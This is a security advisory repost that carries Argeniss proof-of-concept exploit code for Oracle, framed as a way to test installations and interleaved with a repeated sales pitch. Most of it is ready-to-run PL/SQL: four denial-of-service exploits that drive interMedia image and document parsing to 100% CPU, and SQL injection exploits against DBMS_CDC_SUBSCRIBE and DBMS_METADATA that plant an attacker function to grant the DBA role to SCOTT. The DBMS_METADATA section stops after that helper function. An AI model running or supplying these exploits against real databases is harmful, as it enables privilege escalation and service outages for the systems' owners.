Summary
As we reported in our previous articles: Oracle interMedia DoS, Multiple SQL Injection Vulnerabilities in DBMS_CDC_SUBSCRIBE and DBMS_CDC_ISUBSCRIBE Packages and Multiple SQL Injection Vulnerabilities in DBMS_METADATA Package, multiple vulnerabilities have been discovered in Oracle. The following exploit code can be used to test your Oracle installation for the mentioned vulnerabilities.

Credit:
The information has been provided by Cesar.
The original article can be found at: http://www.argeniss.com/research.html

Details
Exploit for Oracle interMedia DoS:
/*
Argeniss - Information Security
http://www.argeniss.com
info>at<argeniss>dot<com

You think you are secure because you are running the unbreakable Oracle, you think you are secure because you are up to date with patches, you think you are secure because etc., etc......
You are wrong, Oracle software is so buggy that it can be owned in five seconds bypassing all protection mechanisms. Think how much money you will loose when your corporate data is compromised.
There are still dozens of unpatched vulnerabilities. The best protection is eliminating vulnerabilities.
Join AVI service now and be safe http://www.argeniss.com/services.html
Find out the special offer for Oracle vulnerability pack, it includes all unpatched Oracle vulnerability information with workaround scripts ready to apply.

Proof of concept exploit code for the Denial of Service vulnerability in Oracle InterMedia.
http://www.argeniss.com/research.html
By Esteban Martinez Fayo (esteban>at<argeniss>dot<com)

These exploits makes the Oracle process to consume 100% CPU usage.
*/

-- Exploit 1: Explicitly setting two null bytes to localData property
DECLARE
Image ORDSYS.ORDImage;
BEGIN
Image := ORDSYS.ORDImage.init();
Image.source.localData := TO_BLOB(HEXTORAW('0000'));
Image.setProperties;
END;
/

-- Exploit 2: Loading from filesystem
DECLARE
Image ORDSYS.ORDImage;
BEGIN
Image := ORDSYS.ORDImage.init('file', 'MEDIA_DIR', 'file_with_two_null_bytes.jpg');
Image.setProperties;
END;
/

-- Exploit 3: Loading from web
DECLARE
Image ORDSYS.ORDImage;
BEGIN
Image := ORDSYS.ORDImage.init('HTTP', 'www.someserver.com/',
'file_with_two_null_bytes.jpg');
Image.setProperties;
END;
/

-- Exploit 4: Explicitly setting two null bytes to localData property of ORDDoc type.
DECLARE
Doc ORDSYS.ORDDoc;
R RAW(30000);
BEGIN
Doc := ORDSYS.ORDDoc.init();
Doc.source.localData := TO_BLOB(HEXTORAW('0000'));
Doc.setProperties (R, FALSE);
END;
/

Exploit for DBMS_CDC_SUBSCRIBE and DBMS_CDC_ISUBSCRIBE packages:
/*
Argeniss - Information Security
http://www.argeniss.com
info>at<argeniss>dot<com

You think you are secure because you are running the unbreakable Oracle, you think you are secure because you are up to date with patches, you think you are secure because etc., etc......
You are wrong, Oracle software is so buggy that it can be owned in five seconds bypassing all protection mechanisms. Think how much money you will loose when your corporate data is compromised.
There are still dozens of unpatched vulnerabilities. The best protection is eliminating vulnerabilities.
Join AVI service now and be safe http://www.argeniss.com/services.html
Find out the special offer for Oracle vulnerability pack, it includes all unpatched Oracle vulnerability information with workaround scripts ready to apply.

Proof of concept exploit code for the SQL Injection vulnerability in Oracle
Database Server standard packages SYS.DBMS_CDC_SUBSCRIBE and
SYS.DBMS_CDC_ISUBSCRIBE (parameter SUBSCRIPTION_NAME).
http://www.argeniss.com/research.html
By Esteban Martinez Fayo (esteban>at<argeniss>dot<com)

This exploit grants the DBA role to the user SCOTT.
Required privileges: Database user with privileges to create or modify functions.
For more information on SQL injection issues in Oracle and how this exploit works
see the Advanced SQL Injection in Oracle databases presentation available at
http://www.argeniss.com/research.html
*/

-- First we create the function to be injected and executed as the SYS user.
CREATE OR REPLACE FUNCTION "SCOTT"."ATTACKER_FUNC" return varchar2
authid current_user as
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT';
COMMIT;
RETURN '';
END;
/

-- Inject the function in the vulnerable procedure
BEGIN
SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION('''||SCOTT.ATTACKER_FUNC()||''');
END;
/

Exploit for DBMS_METADATA package:
/*
Argeniss - Information Security
http://www.argeniss.com
info>at<argeniss>dot<com

You think you are secure because you are running the unbreakable Oracle, you think you are secure because you are up to date with patches, you think you are secure because etc., etc......
You are wrong, Oracle software is so buggy that it can be owned in five seconds bypassing all protection mechanisms. Think how much money you will loose when your corporate data is compromised.
There are still dozens of unpatched vulnerabilities. The best protection is eliminating vulnerabilities.
Join AVI service now and be safe http://www.argeniss.com/services.html
Find out the special offer for Oracle vulnerability pack, it includes all unpatched Oracle vulnerability information with workaround scripts ready to apply.

Proof of concept exploit code for the SQL Injection vulnerability in Oracle
Database Server standard package DBMS_METADATA.
http://www.argeniss.com/research.html
By Esteban Martinez Fayo (esteban>at<argeniss>dot<com)

This exploit grants the DBA role to the user SCOTT.
Required privileges: Database user with privileges to create or modify functions.
For more information on SQL injection issues in Oracle and how this exploit works
see the Advanced SQL Injection in Oracle databases presentation available at
http://www.argeniss.com/research.html
*/

-- First we create the function to be injected and executed as the SYS user.
CREATE OR REPLACE FUNCTION "SCOTT"."ATTACKER_FUNC" return varchar2
authid current_user as
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT';
COMMIT;
RETURN '';
END;
/